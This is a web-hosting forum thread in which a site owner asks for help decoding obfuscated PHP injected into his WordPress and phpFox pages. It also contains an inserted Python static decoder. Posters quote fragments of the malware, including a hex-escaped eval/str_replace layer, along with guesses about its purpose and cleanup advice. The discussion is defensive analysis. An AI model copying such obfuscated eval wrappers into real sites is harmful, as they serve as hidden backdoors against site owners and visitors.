-
12-14-2013, 12:12 PM #1Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
Website hacked, code added to top of all pages, somebody can decode it???
My websites were hacked and someone added some PHP code to all my pages, but it is not easy for me to decode. If somebody knows what this is, please help me. I want to see the decoded PHP code of this:
http://pastebin.com/GumkwvXP
Thanks.
-
12-14-2013, 03:09 PM #2Web Hosting Master
- Join Date
- Nov 2005
- Posts
- 3,944
I'd be afraid to run this on a non-sandbox environment but it comes down to this actually being run:
Code:
$qrkhbdbmht($ivgafnkywx, $skcnswjmwb, NULL);
-
12-14-2013, 03:32 PM #3Web Hosting Master
- Join Date
- Nov 2005
- Posts
- 3,944
I did some more digging, that is a preg_replace with more obfuscation. So there are multiple levels of obfuscation on this code. I suspect it would take a little while to figure out exactly what it is doing. If you are concerned about it, I suggest either you restore all files from a backup or hire a security consultant who can get to the bottom of it.
-
12-15-2013, 07:02 PM #4Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
If you can figure out what the data block at the bottom
"\x20\57\x2a\40\x76\147\x69\151\x62\145\x72\146\x6c\171\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\ x28\50\x31\62\x39\55\x39\62\x29\51\x2c\40\x63\150\x72\50\x28\63\x36\62\x2d\62\x37\60\x29\51\x2c\40\x6c\157\x6a\150\x75\145\x78\171\x6e\167\x28\44\x68\ 165\x6e\172\x62\167\x62\147\x64\160\x2c\44\x6d\165\x79\157\x73\155\x75\167\x62\162\x29\51\x29\73\x20\57\x2a\40\x67\172\x74\151\x75\171\x61\162\x74\144 \x20\52\x2f\40"
is it may give you an idea
-
12-15-2013, 08:55 PM #5Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
That is:
/* vgiiberfly */ eval(str_replace(chr\ x28(129-92)), chr((362-270)), lojhuexynw($h\ 165nzbwbgdp,$muyosmuwbr))); /* gztiuyartd */
But I still can't tell what this code is doing...
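Added example, not part of any post in this thread: a static Python decoder for the `\xHH` and octal escapes in the string quoted in post #4. It tolerates the stray whitespace after two of that string's backslashes and folds the constant `chr((a-b))` calls. The function names are hypothetical, and nothing from the sample is executed.

```python
import re

# Eval statement from the escaped string quoted in post #4, copied as it
# appears in the thread, including stray spaces after two backslashes.
SAMPLE = (
    r"\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28"
    r"\143\x68\162\ x28\50\x31\62\x39\55\x39\62\x29\51\x2c\40\x63\150\x72\50"
    r"\x28\63\x36\62\x2d\62\x37\60\x29\51\x2c\40\x6c\157\x6a\150\x75\145\x78"
    r"\171\x6e\167\x28\44\x68\ 165\x6e\172\x62\167\x62\147\x64\160\x2c\44\x6d"
    r"\165\x79\157\x73\155\x75\167\x62\162\x29\51\x29\73"
)

# PHP double-quoted strings accept \xH or \xHH (hex) and \N to \NNN (octal).
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")
# Constant expressions of the form chr((a-b)), as used in this sample.
CONST_CHR = re.compile(r"chr\(\((\d+)-(\d+)\)\)")


def decode_php_escapes(text):
    """Decode hex/octal escapes statically; the PHP is never executed."""
    # Assumption: whitespace between a backslash and its digits is stray.
    text = re.sub(r"\\\s+(?=[x0-7])", r"\\", text)

    def repl(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        return chr(int(match.group(2), 8) & 0xFF)  # PHP keeps the low byte

    return ESCAPE.sub(repl, text)


def fold_constant_chr(php):
    """Rewrite chr((a-b)) as the quoted one-character literal it yields."""
    def repl(match):
        value = (int(match.group(1)) - int(match.group(2))) % 256
        return repr(chr(value))

    return CONST_CHR.sub(repl, php)


if __name__ == "__main__":
    layer = decode_php_escapes(SAMPLE)
    print(layer)
    print(fold_constant_chr(layer))
```

The folded output shows that this layer only turns `%` back into `\` in whatever `lojhuexynw(...)` returns and passes the result to `eval`, so it is a wrapper around a further encoded layer.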
-
12-15-2013, 09:37 PM #6Newbie
- Join Date
- Nov 2009
- Posts
- 15
You can try this tool: http://ddecode.com/phpdecoder/
No matter what the code is doing, you should clean up your site.
-
12-15-2013, 09:40 PM #7Junior Guru Wannabe
- Join Date
- Nov 2013
- Posts
- 42
Why not restore your site from a backup?
-
12-16-2013, 04:19 AM #8
-
12-16-2013, 06:28 AM #9Web Host Reviewer
- Join Date
- Feb 2006
- Location
- Kepler 62f
- Posts
- 16,703
Google this:
muyosmuwbr
- injecting porn ads
- changing (or trying to change) PHP settings
- scanning site users/passwords
-
12-16-2013, 07:26 AM #10Temporarily Suspended
- Join Date
- Dec 2013
- Posts
- 35
Removing this file would solve the hacking problem. Try to scan all the files and folders on the server to completely remove all vulnerable exploits.
As for the code, @kpmedia should be right. Pretty sure it scans usernames & passwords throughout the server, since I once had a similar file like this on one of our clients' unmanaged servers.
-
12-16-2013, 07:38 AM #11Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
I already removed all of this code from a hundred PHP files, but I need to know what it is doing...
Thanks.
-
12-17-2013, 01:12 AM #12Web Monkey
- Join Date
- Dec 2005
- Location
- Finland
- Posts
- 1,471
Is this a WordPress site, or something else? Can't help you much without knowing something about the technology.
In any case, you probably have old or unsafe script somewhere.
-
12-17-2013, 07:28 AM #13Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
I have WordPress and phpFox...
-
12-18-2013, 01:05 AM #14Web Monkey
- Join Date
- Dec 2005
- Location
- Finland
- Posts
- 1,471
Well, that's a start.
Are the scripts updated to the latest versions? What kind of theme are you using on the WordPress site? Do you have plugins that may have known vulnerabilities?
If you can restore from a recent backup, that's probably your best bet. I guess there's no such backup or you'd have told us about that. You may want to check if your host is automatically backing up your site, but they're not exactly required to do so.
If you can log in, reinstalling WordPress should remove most instances of code in the system core files. Then you need to check the upload folders, themes, plugins, and config files.
You could install Wordfence to scan the site for any remnants of the hack. It's not always able to find everything, but it's much better than just randomly poking around.
That's a start at least. If it seems overwhelming, please hire a professional to do the cleaning.
-
12-18-2013, 01:18 AM #15Junior Guru
- Join Date
- May 2013
- Posts
- 177
By the way that script itself seems to do absolutely nothing.
-
12-18-2013, 03:48 AM #16Web Monkey
- Join Date
- Dec 2005
- Location
- Finland
- Posts
- 1,471
That's expected. It's likely that there's some sort of trigger or condition, and the script doesn't run if that's not met. It's intended to stay as hidden as possible. It's also possible that the payload or backdoor is somewhere under the site, and that piece is just calling that code.
-
12-18-2013, 06:26 AM #17Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
Yeah I decoded bits of it as well - all it seemed to do was wrap itself up about 121 times I think it was and do nothing else - so unless I missed something buried somewhere between the first ten wraps and the last few - it doesn't do anything.
I ran it on a scratch domain on my laptop and it produced zero output.
So I don't know.
-
12-18-2013, 07:09 AM #18Web Hosting Master
- Join Date
- Jan 2004
- Posts
- 1,310
-
12-18-2013, 07:11 PM #19Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
-
12-18-2013, 08:56 PM #20Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
Looks like this hacker is a very good coder or is using some very good tool to encode this code...
-
12-18-2013, 10:17 PM #21Junior Guru
- Join Date
- May 2013
- Posts
- 177
No, it simply doesn't do anything and you can discover that in about 5 minutes.
If you use a PHP formatting tool, you'll see everything is simple string manipulation (without echoing, saving or doing anything to any strings - just manipulating them).
This is the only questionable code.
Code:
$qrkhbdbmht($ivgafnkywx, $skcnswjmwb, NULL);
So there, in 3-5 minutes you have discovered that this code performs absolutely nothing at all. No password scanning, nothing at all.
It might be likely that there are other parts involved, and this part along with the others can do something malicious, but given just this code it is completely harmless.
-
12-18-2013, 10:28 PM #22Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
It has an eval in there that executes the string $skcnswjmwb returned from the previous manipulation.
It returns a version of the same thing with another $muyosmuwbr